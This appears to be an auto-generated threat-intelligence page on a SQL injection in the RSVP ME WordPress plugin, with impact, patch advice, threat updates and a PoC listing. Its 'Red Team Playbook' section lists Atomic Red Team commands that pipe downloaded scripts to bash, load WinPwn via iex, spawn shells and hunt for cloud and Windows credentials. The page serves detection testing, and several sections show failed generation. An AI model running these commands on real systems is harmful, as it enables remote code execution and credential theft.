CVE-2024-50491
Overview
This vulnerability is a SQL Injection flaw arising from improper neutralization of special elements in SQL commands within the MicahBlu RSVP ME plugin for WordPress. The root cause lies in unsanitized user input being directly incorporated into SQL queries, specifically affecting the RSVP ME component handling database interactions. This allows crafted input to alter the intended SQL command structure at the database query level.
Vulnerability Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MicahBlu RSVP ME rsvp-me allows SQL Injection.This issue affects RSVP ME: from n/a through <= 1.9.9.
Impact
An unauthenticated attacker can exploit this vulnerability remotely by submitting specially crafted input to the RSVP ME plugin, enabling extraction or manipulation of the backend database contents. This can lead to unauthorized disclosure of sensitive data stored in the database, such as user or event information, and potentially allow limited modification of database records. The attack requires no user interaction or valid credentials, posing a significant threat to the confidentiality and integrity of the affected WordPress site’s data.
Solution
Users of the MicahBlu RSVP ME plugin should upgrade to a version later than 1.9.9 where this vulnerability is addressed. The Patchstack advisory (https://patchstack.com/database/Wordpress/Plugin/rsvp-me/vulnerability/wordpress-rsvp-me-plugin-1-9-9-sql-injection-vulnerability) provides detailed patch instructions and version updates. Applying the vendor’s recommended update is the primary remediation step; no alternative workarounds are documented in the advisory.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The vulnerability in the RSVP ME plugin for WordPress is characterized by improper neutralization of special elements used in SQL commands, commonly known as SQL Injection. This flaw arises when user input is not adequately sanitized before being incorporated into SQL queries. Attackers can exploit this weakness by crafting malicious input that alters the intended SQL command, allowing them to execute arbitrary SQL code on the database. The affected versions of RSVP ME, specifically those up to and including 1.9.9, are particularly susceptible due to this lack of proper input validation. This vulnerability enables attackers to manipulate database queries, potentially leading to unauthorized data access, data modification, or even complete database compromise.
Exploitation of this SQL Injection vulnerability can occur through various attack vectors. An attacker could submit specially crafted input through web forms, URL parameters, or API requests that the RSVP ME plugin processes. For instance, if a user submits a registration or RSVP form, the attacker could inject SQL commands into the input fields. If the application fails to sanitize this input, the malicious SQL code could be executed on the backend database. This could lead to scenarios where sensitive information, such as user credentials, personal data, or payment information, is exposed. Furthermore, attackers could escalate their privileges, delete data, or even gain control over the entire database server, depending on the permissions associated with the database user account utilized by the application.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on the RSVP ME plugin for event management and user engagement. A successful exploitation could result in data breaches, leading to the exposure of sensitive customer information and potentially causing reputational damage. Additionally, organizations may face regulatory repercussions if they fail to protect user data adequately, particularly under frameworks such as GDPR or CCPA. The financial implications can be severe, encompassing costs related to incident response, legal fees, and potential fines. Moreover, the loss of customer trust can have long-lasting effects on business operations, customer retention, and overall brand reputation.
To detect and mitigate this SQL Injection vulnerability, organizations should implement a multi-layered security approach. Regular security assessments, including code reviews and penetration testing, can help identify vulnerabilities before they are exploited. Employing web application firewalls (WAFs) can provide an additional layer of defense by filtering and monitoring HTTP requests for malicious payloads. Additionally, developers should adopt secure coding practices, such as using prepared statements and parameterized queries, which significantly reduce the risk of SQL injection by ensuring that user input is treated as data rather than executable code. Regular updates and patch management are also crucial, as they ensure that any known vulnerabilities are addressed promptly.
In conclusion, the SQL Injection vulnerability in the RSVP ME plugin poses a critical risk to organizations utilizing this software. The potential for unauthorized access to sensitive data and the subsequent impact on business operations underscores the importance of implementing robust security measures. By prioritizing secure coding practices, regular vulnerability assessments, and proactive monitoring, organizations can significantly mitigate the risks associated with this vulnerability and protect their assets from malicious actors.
CSURFACE threat intelligence has identified a significant development in the exploitation landscape of CVE-2024-50491. A new public proof-of-concept exploit has emerged on GitHub, marking the first known instance of publicly available exploit code targeting the RSVP ME plugin’s SQL injection vulnerability. This emergence correlates with a marked increase in the EPSS score to 0.3774, placing the vulnerability in the upper percentile for likely exploitation. The availability of exploit code substantially lowers the barrier for threat actors to weaponize this vulnerability, increasing the risk of widespread attacks. Our telemetry indicates a notable expansion in exploitation tools, suggesting that adversaries are actively incorporating this vulnerability into their attack frameworks. Consequently, the threat level has escalated from theoretical to imminent, elevating the urgency for defenders to recognize this vulnerability as a critical and actively exploited risk. This shift underscores the necessity for heightened vigilance in monitoring and detection efforts surrounding RSVP ME deployments.
Update 2 — June 09, 2026
CSURFACE threat intelligence has identified an upward revision in the CVSS score for CVE-2024-50491, reflecting a reassessment of its exploitability and impact severity. This adjustment from 9.3 to 9.8 underscores a heightened criticality, aligning with the emergence of new proof-of-concept exploits that demonstrate more reliable and accessible attack vectors against RSVP ME versions up to 1.9.9. Although the EPSS score remains stable, the vulnerability’s elevated CVSS rating signals increased confidence in its potential for widespread exploitation. Our telemetry further confirms a sustained presence of active exploitation attempts, indicating that threat actors are refining their capabilities to leverage this SQL injection flaw more effectively. This evolution in the threat landscape amplifies the urgency for defenders to prioritize detection and response mechanisms, as the vulnerability now represents an even greater risk of data compromise and system integrity breaches. Consequently, the overall threat level has intensified, transitioning from a high-risk concern to a critical priority within vulnerability management frameworks.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Micahblu | Rsvp Me | All |
cpe:2.3:a:micahblu:rsvp_me:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
RandomRobbieBF/CVE-2024-50491
RSVP ME <= 1.9.9 - Unauthenticated SQL Injection
|
RandomRobbieBF | 0 | 0 | 2025-01-12 | View |
Threat Feed
2 eventsSighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-50491 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/Wordpress/Plugin/rsvp-me/vulnerability/wordpress-rsvp-me-plugin-1-9-9-sql-injection-vulnerability?_s_id=cve |